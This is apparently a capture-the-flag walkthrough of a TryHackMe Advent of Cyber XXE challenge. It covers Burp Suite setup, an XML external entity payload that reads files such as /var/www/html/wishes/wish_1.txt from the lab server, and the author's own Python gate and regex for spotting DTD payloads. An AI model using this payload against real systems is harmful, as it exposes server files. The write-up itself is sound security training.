
Day 5: SOC-mas XX-what-ee?

Tryhackme Advent of Cyber 2024 Day 5 Banner | Credits: Tryhackme

Note:

Hey! Before you go through this writeup, try the task yourself first. If you get stuck, come back and check out the writeup.

XML (Extensible Markup Language) is a way to structure and store data in a plain text format that’s easy to read and share. It uses tags to define elements, like <name>John</name>, making it flexible for representing different types of information. XML is often used for data exchange between systems, configuration files, and even storing data for applications. While it’s super versatile, it can get bulky compared to newer formats like JSON.

Before we start we need to set up BurpSuite as the challenge suggests. I'm going to keep it short:

  1. Go through the initial setup process; you can leave everything at its defaults.
  2. Go to the Proxy tab and click on Settings.
  3. In Settings, under Tools → Burp's Browser, tick the "Allow Burp's browser to run without a sandbox" option.

If you need more help setting up BurpSuite, refer to the TryHackMe challenge itself. It has a step-by-step guide with screenshots for this setup.

Once that is done, navigate back to the Proxy tab and click on Open browser. In the browser that opens, navigate to your AttackBox IP.

If nothing loads when you visit the web page through the Burp browser, go back to BurpSuite and, in the Proxy → Intercept tab, turn Intercept off.

Q: What is the flag discovered after navigating through the wishes?

A: On the website, add a product to the wish list. In BurpSuite, navigate to Proxy → HTTP History and look for a POST entry for /Wishlist.php.

Right click on it and click Send to Repeater.

Go to the Repeater tab and the post request should be there.

Modify the request XML with the one provided in the challenge description (the XML declaration on the first line is shown here as it appears in the challenge; the rendered post had mangled it into an HTML comment):

<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
	<user_id>1</user_id>
	<item>
		<product_id>&payload;</product_id>
	</item>
</wishlist>

Change the number in wish_<number>.txt and go through each text file until the flag is found. The server reads the file named in the external entity and echoes its contents back in place of &payload;, which is why the product_id field in the response shows the wish text.
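For the defending side, here is a small added example (my own code, not part of the TryHackMe challenge or the original post) showing how a wishlist endpoint like /Wishlist.php could refuse the payload above before it ever reaches an XML parser, and how an analyst can pull the file path out of a captured body while triaging HTTP history. The request bodies and the function names (xxe_indicators, parse_wishlist) are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies modelled on the wishlist POST from the task.
BENIGN_BODY = """<?xml version="1.0" ?>
<wishlist>
  <user_id>1</user_id>
  <item><product_id>7</product_id></item>
</wishlist>"""

XXE_BODY = """<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
  <user_id>1</user_id>
  <item><product_id>&payload;</product_id></item>
</wishlist>"""

# Any inline DTD or entity declaration is a red flag for a wishlist upload:
# a legitimate client never needs one, so the safest policy is to reject it.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Extracts the SYSTEM/PUBLIC target of general (&x;) and parameter (%x;) entities,
# which is the file or URL the attacker is trying to make the server fetch.
SYSTEM_RE = re.compile(
    r'<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]+)"',
    re.IGNORECASE,
)


def xxe_indicators(body):
    """Triage helper: return the external resources an inline DTD points at ([] if none)."""
    return SYSTEM_RE.findall(body)


def parse_wishlist(body):
    """Server-side gate: refuse DTDs outright, then parse and return the product ids."""
    if DTD_RE.search(body):
        raise ValueError("DTD/entity declarations are not accepted in wishlist uploads")
    root = ET.fromstring(body)
    if root.tag != "wishlist":
        raise ValueError("unexpected root element %r" % root.tag)
    return [item.text for item in root.iter("product_id")]


if __name__ == "__main__":
    print(parse_wishlist(BENIGN_BODY))      # ['7']
    print(xxe_indicators(XXE_BODY))         # ['/var/www/html/wishes/wish_1.txt']
```

The regex gate is deliberately placed before parsing because whether a parser resolves external entities depends on its defaults (PHP's simplexml with LIBXML_NOENT, older libxml2 builds); refusing the DTD removes that dependency.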

Q: What is the flag seen on the possible proof of sabotage?

A: Towards the end of the challenge description there is a mention of a change log being hosted at http://MACHINE-IP/CHANGELOG. The flag is there.

Q: If you want to learn more about the XXE injection attack, check out the XXE room!

A: No Answer needed!

Q: Following McSkidy's advice, Software recently hardened the server. It used to have many unneeded open ports, but not anymore. Not that this matters in any way.

A: No Answer needed!